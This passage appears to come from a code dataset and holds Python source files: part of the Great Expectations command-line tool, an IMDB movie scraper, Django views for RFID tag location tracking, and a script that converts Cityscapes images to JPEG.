click.confirm(LETS_BEGIN_PROMPT, default=True):\n cli_message(RUN_INIT_AGAIN)\n exit(0)\n\n context, data_source_name, data_source_type = _create_new_project(target_directory)\n if not 
data_source_name: # no datasource was created\n return\n\n profile_datasource(context, data_source_name, open_docs=view, additional_batch_kwargs={\"limit\": 1000})\n cli_message(\"\"\"\\nGreat Expectations is now set up in your project!\"\"\")\n\n\ndef _slack_setup(context):\n webhook_url = None\n cli_message(SLACK_SETUP_INTRO)\n if not click.confirm(SLACK_SETUP_PROMPT, default=True):\n cli_message(SLACK_LATER)\n return context\n else:\n webhook_url = click.prompt(SLACK_WEBHOOK_PROMPT, default=\"\")\n\n while not is_sane_slack_webhook(webhook_url):\n cli_message(\"That URL was not valid.\\n\")\n if not click.confirm(SLACK_SETUP_PROMPT, default=True):\n cli_message(SLACK_LATER)\n return context\n webhook_url = click.prompt(SLACK_WEBHOOK_PROMPT, default=\"\")\n\n context.save_config_variable(\"validation_notification_slack_webhook\", webhook_url)\n cli_message(SLACK_SETUP_COMPLETE)\n\n return context\n\n\ndef _get_full_path_to_ge_dir(target_directory):\n return os.path.abspath(os.path.join(target_directory, DataContext.GE_DIR))\n\n\ndef _create_new_project(target_directory):\n try:\n context = DataContext.create(target_directory)\n data_source_name, data_source_type = add_datasource_impl(context)\n return context, data_source_name, data_source_type\n except ge_exceptions.DataContextError as err:\n logger.critical(err.message)\n sys.exit(-1)\n\n\ndef _complete_onboarding(target_dir):\n if click.confirm(COMPLETE_ONBOARDING_PROMPT, default=True):\n DataContext.create(target_dir)\n cli_message(ONBOARDING_COMPLETE)\n else:\n cli_message(RUN_INIT_AGAIN)\n\n\n\n@cli.command()\n@click.option(\n '--directory',\n '-d',\n default=None,\n help=\"The project's great_expectations directory.\"\n)\n@click.option(\n \"--view/--no-view\",\n help=\"By default open in browser unless you specify the --no-view flag\",\n default=True\n)\ndef add_datasource(directory, view):\n \"\"\"Add a new datasource to the data context.\"\"\"\n try:\n context = DataContext(directory)\n except ge_exceptions.ConfigNotFoundError as err:\n cli_message(\"{}\".format(err.message))\n return\n except ge_exceptions.ZeroDotSevenConfigVersionError as err:\n _offer_to_install_new_template(err, context.root_directory)\n\n data_source_name, data_source_type = add_datasource_impl(context)\n\n if not data_source_name: # no datasource was created\n return\n\n profile_datasource(context, data_source_name, open_docs=view)\n\n\n@cli.command()\n@click.option(\n '--directory',\n '-d',\n default=None,\n help=\"The project's great_expectations directory.\"\n)\ndef list_datasources(directory):\n \"\"\"List known datasources.\"\"\"\n try:\n context = DataContext(directory)\n datasources = context.list_datasources()\n # TODO Pretty up this console output\n cli_message(str([d for d in datasources]))\n except ge_exceptions.ConfigNotFoundError as err:\n cli_message(\"{}\".format(err.message))\n return\n except ge_exceptions.ZeroDotSevenConfigVersionError as err:\n _offer_to_install_new_template(err, context.root_directory)\n\n\n@cli.command()\n@click.argument('datasource_name', default=None, required=False)\n@click.option('--data_assets', '-l', default=None,\n help='Comma-separated list of the names of data assets that should be profiled. Requires datasource_name specified.')\n@click.option('--profile_all_data_assets', '-A', is_flag=True, default=False,\n help='Profile ALL data assets within the target data source. 
'\n 'If True, this will override --max_data_assets.')\n@click.option(\n \"--directory\",\n \"-d\",\n default=None,\n help=\"The project's great_expectations directory.\"\n)\n@click.option('--batch_kwargs', default=None,\n help='Additional keyword arguments to be provided to get_batch when loading the data asset. Must be a valid JSON dictionary')\n@click.option(\n \"--view/--no-view\",\n help=\"By default open in browser unless you specify the --no-view flag\",\n default=True\n)\ndef profile(datasource_name, data_assets, profile_all_data_assets, directory, view, batch_kwargs):\n \"\"\"\n Profile datasources from the specified context.\n\n If the optional data_assets and profile_all_data_assets arguments are not specified, the profiler will check\n if the number of data assets in the datasource exceeds the internally defined limit. If it does, it will\n prompt the user to either specify the list of data assets to profile or to profile all.\n If the limit is not exceeded, the profiler will profile all data assets in the datasource.\n\n :param datasource_name: name of the datasource to profile\n :param data_assets: if this comma-separated list of data asset names is provided, only the specified data assets will be profiled\n :param profile_all_data_assets: if provided, all data assets will be profiled\n :param directory:\n :param view: Open the docs in a browser\n :param batch_kwargs: Additional keyword arguments to be provided to get_batch when loading the data asset.\n :return:\n \"\"\"\n\n try:\n context = DataContext(directory)\n except ge_exceptions.ConfigNotFoundError as err:\n cli_message(\"{}\".format(err.message))\n return\n except ge_exceptions.ZeroDotSevenConfigVersionError as err:\n _offer_to_install_new_template(err, context.root_directory)\n return\n\n if batch_kwargs is not None:\n batch_kwargs = json.loads(batch_kwargs)\n\n if datasource_name is None:\n datasources = [datasource[\"name\"] for datasource in context.list_datasources()]\n if not datasources:\n cli_message(NO_DATASOURCES_FOUND)\n sys.exit(-1)\n elif len(datasources) > 1:\n cli_message(\n \"Error: please specify the datasource to profile. \"\\\n \"Available datasources: \" + \", \".join(datasources) + \"\"\n )\n sys.exit(-1)\n else:\n profile_datasource(\n context,\n datasources[0],\n data_assets=data_assets,\n profile_all_data_assets=profile_all_data_assets,\n open_docs=view,\n additional_batch_kwargs=batch_kwargs\n )\n else:\n profile_datasource(\n context,\n datasource_name,\n data_assets=data_assets,\n profile_all_data_assets=profile_all_data_assets,\n open_docs=view,\n additional_batch_kwargs=batch_kwargs\n )\n\n\n@cli.command()\n@click.option(\n '--directory',\n '-d',\n default=None,\n help=\"The project's great_expectations directory.\"\n)\n@click.option('--site_name', '-s',\n help='The site for which to generate documentation. 
See data_docs section in great_expectations.yml')\n@click.option(\n \"--view/--no-view\",\n help=\"By default open in browser unless you specify the --no-view flag\",\n default=True\n)\ndef build_docs(directory, site_name, view=True):\n \"\"\"Build Data Docs for a project.\"\"\"\n logger.debug(\"Starting cli.build_docs\")\n\n try:\n context = DataContext(directory)\n build_documentation_impl(\n context,\n site_name=site_name\n )\n if view:\n context.open_data_docs()\n except ge_exceptions.ConfigNotFoundError as err:\n cli_message(\"{}\".format(err.message))\n sys.exit(1)\n except ge_exceptions.ZeroDotSevenConfigVersionError as err:\n _offer_to_install_new_template(err, context.root_directory)\n return\n except ge_exceptions.PluginModuleNotFoundError as err:\n cli_message(err.cli_colored_message)\n sys.exit(1)\n except ge_exceptions.PluginClassNotFoundError as err:\n cli_message(err.cli_colored_message)\n sys.exit(1)\n\n\n@cli.command()\n@click.option(\n '--directory',\n '-d',\n default=\"./great_expectations\",\n help=\"The project's great_expectations directory.\"\n)\ndef check_config(directory):\n \"\"\"Check a config for validity and help with migrations.\"\"\"\n cli_message(\"Checking your config files for validity...\\n\")\n\n try:\n is_config_ok, error_message = do_config_check(directory)\n if is_config_ok:\n cli_message(\"Your config file appears valid!\")\n else:\n cli_message(\"Unfortunately, your config appears to be invalid:\\n\")\n cli_message(\"{}\".format(error_message))\n sys.exit(1)\n except ge_exceptions.ZeroDotSevenConfigVersionError as err:\n _offer_to_install_new_template(err, directory)\n\n\ndef _offer_to_install_new_template(err, ge_dir):\n ge_dir = os.path.abspath(ge_dir)\n cli_message(\"{}\".format(err.message))\n ge_yml = os.path.join(ge_dir, DataContext.GE_YML)\n archived_yml = ge_yml + \".archive\"\n\n if click.confirm(\n NEW_TEMPLATE_PROMPT.format(ge_yml, archived_yml),\n default=True\n ):\n # archive existing project config\n shutil.move(ge_yml, archived_yml)\n DataContext.write_project_template_to_disk(ge_dir)\n\n cli_message(NEW_TEMPLATE_INSTALLED.format(\"file://\" + ge_yml, \"file://\" + archived_yml))\n else:\n cli_message(\n \"\"\"\\nOK. To continue, you will need to upgrade your config file to the latest format.\n - Please see the docs here: https://docs.greatexpectations.io/en/latest/reference/data_context_reference.html\n - We are super sorry about this breaking change! 
:]\n - If you are running into any problems, please reach out on Slack and we can\n help you in realtime: https://greatexpectations.io/slack\"\"\"\n )\n sys.exit(0)\n\n\ndef do_config_check(target_directory):\n try:\n DataContext(context_root_dir=target_directory)\n return True, None\n except (\n ge_exceptions.InvalidConfigurationYamlError,\n ge_exceptions.InvalidTopLevelConfigKeyError,\n ge_exceptions.MissingTopLevelConfigKeyError,\n ge_exceptions.InvalidConfigValueTypeError,\n ge_exceptions.InvalidConfigVersionError,\n ge_exceptions.UnsupportedConfigVersionError,\n ge_exceptions.DataContextError,\n ge_exceptions.PluginClassNotFoundError\n ) as err:\n return False, err.message\n\n\ndef main():\n handler = logging.StreamHandler()\n # Just levelname and message Could re-add other info if we want\n formatter = logging.Formatter(\n '%(message)s')\n # '%(asctime)s %(name)-12s %(levelname)-8s %(message)s')\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n logger.setLevel(logging.INFO)\n cli()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"great_expectations/cli/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":20058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"240163197","text":"from lxml import html\nimport requests\n\n# Global debug variable, turns on several printed tests\ndebug = False\n\n\ndef search(title):\n # Run search, save results into local variable\n if debug:\n print(\"search CALLED\") # Debug statement\n search_string = get_search_results(title)\n\n # Pass resulting search URL into get_html_tree\n movie_tree = get_html_tree(search_string)\n if debug:\n print(\"search RETURNING\")\n return movie_tree\n\n\ndef get_search_results(title):\n search_text = title\n # Format search URL and grab the search results page\n search_page = requests.get('http://www.imdb.com/find?q=' + str(search_text).strip() + '&s=tt')\n # Create an HTML tree using html.fromstring\n search_tree = html.fromstring(search_page.content)\n # Grab the URL of the first movie page in the search results\n search_result = search_tree.xpath('//td[@class=\"result_text\"][1]/a/@href')\n # Return the string that contains the URL, or error handler if it wasn't found\n if search_result:\n return search_result[0].strip()\n else:\n print(\"No movies with this title found.\")\n return False\n # print \"Search result URL: \", search_result[0] #Debug statement\n\n\ndef get_html_tree(movie_link):\n # Determine if passed value is False (which means null value in previous function)\n if movie_link is False:\n return False\n # Passes movie_link parameter to requests.get\n movie_page = requests.get('http://www.imdb.com' + str(movie_link))\n # Generate an HTML tree of movie page\n movie_tree = html.fromstring(movie_page.content)\n return movie_tree\n\n\ndef get_summary(movie_tree, movie):\n # Grab the summary (returns as string)\n xpath = movie_tree.xpath('//*[@id=\"title-overview-widget\"]//div[@class=\"summary_text\"]/text()|'\n '//*[@id=\"title-overview-widget\"]//div[@class=\"summary_text\"]/a/text()')\n # xpath is converted to string via .join()\n summary = ''.join(xpath).strip()\n # Return the string summary or error handler if no summary found\n if summary:\n movie.summary = summary\n else:\n movie.summary = \"Summary unavailable for this title.\"\n return False\n\n\ndef get_misc(movie_tree, movie):\n if debug:\n print(\"show_misc CALLED\")\n rating_xpath = 
movie_tree.xpath('//*[@id=\"title-overview-widget\"]//div[@class=\"subtext\"]/meta/@content')\n if rating_xpath:\n movie.rating = ''.join(rating_xpath)\n if debug:\n print(\"Movie rating:\", movie.rating) # Debug statement\n\n runtime_xpath = movie_tree.xpath('//*[@id=\"title-overview-widget\"]//div[@class=\"subtext\"]//'\n '*[@itemprop=\"duration\"]/text()')\n if runtime_xpath:\n movie.runtime = ''.join([text.replace('\\n', '').strip() for text in runtime_xpath])\n # Credit: Falcon Taylor-Carter\n if debug:\n print(\"Movie runtime:\", movie.runtime) # Debug statement\n\n genre_xpath = movie_tree.xpath('//*[@id=\"title-overview-widget\"]//div[@class=\"subtext\"]//a/'\n '*[@itemprop=\"genre\"]/text()')\n if genre_xpath:\n genre_xpath = ''.join([''.join((item + ', ') for item in genre_xpath[0:-1]), genre_xpath[-1]])\n movie.genre = genre_xpath\n if debug:\n print(\"Movie genre:\", genre_xpath) # Debug statement\n if debug:\n print(\"show_misc FINISHED\")\n\n\ndef get_reviews(movie_tree, movie):\n # Grab the review (returns as string))\n xpath = movie_tree.xpath('//*[@id=\"title-overview-widget\"]//div[@class=\"imdbRating\"]//strong/@title')\n review = ''.join(xpath).strip()\n if review:\n movie.review = review\n else:\n movie.review = \"Title has no reviews.\"\n\n\nclass Movie:\n \"\"\"Base class for all movies\"\"\"\n def __init__(self, title, summary=\"Summary unavailable\", rating=\"Rating unknown\", runtime=\"Runtime unknown\",\n genre=\"Genre unknown\", review=\"No user reviews.\"): # Change default argument to \"unknown\"\n self.title = title\n self.summary = summary\n # Next three lines effectively \"self.misc\"\n self.rating = rating\n self.runtime = runtime\n self.genre = genre\n self.review = review\n self.alpha_title = self.title.lower()\n self.update()\n self.gen_alpha_title()\n\n def __str__(self):\n return ''.join(string for string in [self.title, '\\n', self.summary, '\\n', self.rating,\n ' | ', self.runtime, ' | ', self.genre, '\\n', self.review])\n\n def __repr__(self):\n return 'Movie(' + ''.join([''.join(string for string in ['\\\"', self.title, '\\\", \\\"', self.summary, '\\\", \\\"',\n self.rating, '\\\", \\\"', self.runtime, '\\\", \\\"',\n self.genre, '\\\", \\\"', self.review, '\\\")'])])\n\n def update(self):\n # Can be called using Movie.update() in order to refresh information, which may have changed on IMDB\n movie_tree = search(self.title)\n get_summary(movie_tree, self)\n get_misc(movie_tree, self)\n get_reviews(movie_tree, self)\n\n def gen_alpha_title(self):\n if \"The \" in self.title[0:4]:\n self.alpha_title = self.title.replace(\"The \", '', 1)\n self.alpha_title += \", The\"\n self.alpha_title = self.alpha_title.lower()\n else:\n self.alpha_title = self.title.lower()\n","sub_path":"imdb_search.py","file_name":"imdb_search.py","file_ext":"py","file_size_in_byte":5479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"567138065","text":"from django.shortcuts import render\nfrom django.http import JsonResponse, HttpResponseNotAllowed, Http404, HttpResponse\nfrom django.utils.dateparse import parse_datetime\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.conf import settings\nfrom .models import TagTracker\nimport datetime\nimport json\n\n@csrf_exempt\ndef update_tag_location(request):\n if request.method == 'POST':\n try:\n data = json.loads(request.body)\n except (ValueError, TypeError) as e:\n msg = 'unable to parse request body as json'\n result = {'error': {'error_code': 500, 
'error_message': msg}}\n            return JsonResponse(result, status=500)\n        try:\n            token = data['token']\n            # Expect a header-style value of the form 'Token <key>'\n            valid_token = token and token[:6] == 'Token ' and token[6:] in settings.VALID_TOKENS\n        except KeyError:\n            valid_token = False\n        if not valid_token:\n            return JsonResponse({'error': {'error_code': 401, 'error_message': 'Unauthorized'}}, status=401)\n        try:\n            tag_id = data['tag_id']\n            antenna = data['antenna']\n            reader = data['reader']\n            found_time = data['found_time']\n            found_time = parse_datetime(found_time)\n            if not found_time:\n                msg = 'unable to parse found_time as timezone aware datetime object'\n                result = {'error': {'error_code': 500, 'error_message': msg}}\n                return JsonResponse(result, status=500)\n            TagTracker.objects.update_tag_location(tag_id, antenna, reader, found_time)\n            result = {'ok': True}\n            return JsonResponse(result, status=200)\n        except KeyError:\n            msg = 'Unable to parse tag_id, antenna, reader, or found_time from request body'\n            result = {'error': {'error_code': 500, 'error_message': msg}}\n            return JsonResponse(result, status=500)\n    return HttpResponseNotAllowed(['POST'])\n\ndef store_stock(request):\n    if request.method == 'GET':\n        tags = TagTracker.objects.store_stock()\n        return render(request, 'tag_metrics/store_stock.html', context={'tags': tags})\n    return HttpResponseNotAllowed(['GET'])\n\ndef tag_location(request):\n    if request.method == 'GET':\n        tags = TagTracker.objects.last_locations()\n        return render(request, 'tag_metrics/tag_location.html', context={'tags': tags})\n    return HttpResponseNotAllowed(['GET'])\n\ndef tag_flow_today(request):\n    if request.method == 'GET':\n        # Bound the query to today, from midnight to just before the next midnight\n        today = datetime.datetime.now()\n        start_date = datetime.datetime.combine(today, datetime.time.min)\n        end_date = datetime.datetime.combine(today, datetime.time.max)\n        start_date = start_date.strftime('%Y-%m-%d %H:%M:%S')\n        end_date = end_date.strftime('%Y-%m-%d %H:%M:%S')\n        tags = TagTracker.objects.tag_flow(start_date, end_date)\n        return render(request,\n                      'tag_metrics/tag_flow.html',\n                      context={'tags': tags,\n                               'start_date': start_date,\n                               'end_date': end_date\n                               }\n                      )\n    return HttpResponseNotAllowed(['GET'])\n\ndef tag_flow_week(request):\n    if request.method == 'GET':\n        # Bound the query to the current week, Monday 00:00:00 through Sunday 23:59:59\n        today = datetime.datetime.now()\n        start_date = datetime.datetime.combine(today, datetime.time.min)\n        start_date = start_date - datetime.timedelta(days=start_date.weekday())\n        end_date = start_date + datetime.timedelta(days=6)\n        end_date = datetime.datetime.combine(end_date, datetime.time.max)\n        start_date = start_date.strftime('%Y-%m-%d %H:%M:%S')\n        end_date = end_date.strftime('%Y-%m-%d %H:%M:%S')\n        tags = TagTracker.objects.tag_flow(start_date, end_date)\n        return render(request,\n                      'tag_metrics/tag_flow.html',\n                      context={'tags': tags,\n                               'start_date': start_date,\n                               'end_date': end_date\n                               }\n                      )\n    return HttpResponseNotAllowed(['GET'])\n","sub_path":"tag_metrics/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"124955953","text":"import cv2 as cv\nimport os\nfrom utils import image_id\n\nrootdir = '/home/cessful/data_set/leftImg8bit_trainvaltest/leftImg8bit/'\nsavedir = '/home/cessful/data_set/city2pascal/JPEGImages/'\n\nfor _set in ['test']:\n    print(_set)\n    # Build the split directory separately instead of mutating rootdir, which\n    # would accumulate split names across iterations if more splits were added\n    setdir = rootdir + _set\n    img_Lists = image_id(setdir)\n    for item in img_Lists:\n        full_name = setdir + '/' + item + '_leftImg8bit' + '.png'\n        print(full_name)\n        img = cv.imread(full_name)\n        index = 
item.rfind('/')\n        # Replace the last '/' in the id with '_' to flatten the city subdirectory into the file name\n        list_temp = list(item)\n        list_temp[index] = '_'\n        out_path = ''.join(list_temp)\n        # Drop the last 24 characters of the id (tied to image_id's naming scheme)\n        out_path = out_path[:-24]\n        # makedirs creates missing parent directories too, and exist_ok avoids a racy exists() check\n        os.makedirs(savedir, exist_ok=True)\n        cv.imwrite(savedir + out_path + '.jpg', img)\n    print(_set)\n\n","sub_path":"extract_img.py","file_name":"extract_img.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"}